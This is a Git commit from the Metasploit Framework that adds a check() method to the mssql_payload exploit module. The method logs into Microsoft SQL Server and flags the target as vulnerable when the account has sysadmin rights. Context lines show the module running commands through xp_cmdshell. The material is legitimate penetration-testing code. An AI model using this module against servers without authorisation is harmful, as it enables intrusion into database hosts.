Land #4660 - Add a check() for mssql_payload

bug/bundler_fix
sinn3r 2015-01-28 15:47:33 -06:00
commit 53af758a03
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 17 additions and 0 deletions

View File

@ -68,6 +68,23 @@ class Metasploit3 < Msf::Exploit::Remote
]) ])
end end
def check
if (not mssql_login_datastore)
vprint_status("Invalid SQL Server credentials")
return Exploit::CheckCode::Detected
end
mssql_query("select @@version", true)
if mssql_is_sysadmin
vprint_good "User #{datastore['USERNAME']} is a sysadmin"
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
ensure
disconnect
end
# This is method required for the CmdStager to work... # This is method required for the CmdStager to work...
def execute_command(cmd, opts) def execute_command(cmd, opts)
mssql_xpcmdshell(cmd, datastore['VERBOSE']) mssql_xpcmdshell(cmd, datastore['VERBOSE'])